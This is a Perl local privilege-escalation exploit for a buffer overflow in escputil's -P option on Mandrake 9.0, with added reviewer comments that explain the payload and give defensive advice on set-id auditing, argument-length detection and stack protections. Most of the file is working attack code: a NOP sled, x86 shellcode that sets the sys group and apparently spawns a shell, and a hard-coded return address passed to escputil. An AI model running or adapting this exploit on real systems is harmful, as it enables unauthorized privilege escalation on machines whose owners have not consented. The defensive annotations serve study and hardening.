#!/usr/bin/perl
######################################################
# Priv8security.com escputil local sys exploit.
#
#    Tested on Mandrake 9.0 only.
#    Based on http://www.idefense.com/advisory/01.21.03.txt
#
# Reviewer summary (defensive reading of this proof of concept):
#
# The script builds a 1050-byte string (0x90 padding, a 36-byte x86
# payload, then one trailing 4-byte address) and hands it to
# /usr/bin/escputil as the value of the -P option.
#
# NOTE(review): the payload's setregid(3, 3) call only gains anything if
# escputil runs with an effective gid of 3, so the target is presumably
# installed setgid "sys" on the affected release -- confirm against the
# advisory referenced above.
#
# Defender notes:
#   - Audit set-id bits on escputil. Removing the bit, or installing the
#     vendor's fixed package, removes the privilege boundary this relies on.
#   - A -P value of roughly a kilobyte that is mostly 0x90 bytes is not a
#     plausible printer name; exec auditing on escputil argument length or
#     content is a usable detection signal.
#   - The address written below is a fixed stack location, so the technique
#     assumes a predictable, executable stack. Address-space randomization
#     and non-executable stacks break that assumption.
#####################################################

# Payload bytes, concatenated from five string literals.
$shellcode =
"\x31\xc0\xb0".  # setregid(x, x): start of the call, x is the next byte
"\x03".          # x = 0x03, which the author labels the sys gid
"\x89\xc3\x89\xc1\xb0\x47\xcd\x80".  # end of setregid(): \xb0\x47 then int 0x80 (\xcd\x80)
# NOTE(review): the remaining bytes embed the ASCII text "n/sh" and "//bi"
# and finish with another int 0x80; this looks like the usual execve of a
# shell -- confirm by disassembly.
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

$size = 1050;             # total length of the argument that gets built
$retaddr = 0xbffff4e0;    # hard-coded address; the optional offset is added to it
$nop = "\x90";            # padding byte placed in front of the payload
$offset = 0;

# Exactly one command-line argument is taken as an adjustment to $retaddr.
# It is used as given; nothing here checks that it is numeric.
if (@ARGV == 1) {
    $offset = $ARGV[0];
}

# Banner and usage text are printed on every run, not only on bad input.
print " Priv8security.com Mandrake 9 escputil local sys exploit!!\n";
print " usage: $0 offset\n";

# Padding: $size - length($shellcode) - 4 bytes, i.e. 1010 with the values above.
for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n";

# pack('l') emits the adjusted address as a 32-bit value in host byte order.
$newret = pack('l', ($retaddr + $offset));

# $i resumes at 1010 + 36 = 1046, so this loop runs once and appends a single
# copy of the address, bringing $buffer to exactly $size bytes.
for ($i += length($shellcode); $i < $size; $i += 4) {
    $buffer .= $newret;
}

# exec replaces this Perl process with escputil; the whole buffer is
# interpolated into the command string as the -P value.
exec("/usr/bin/escputil -c -P $buffer");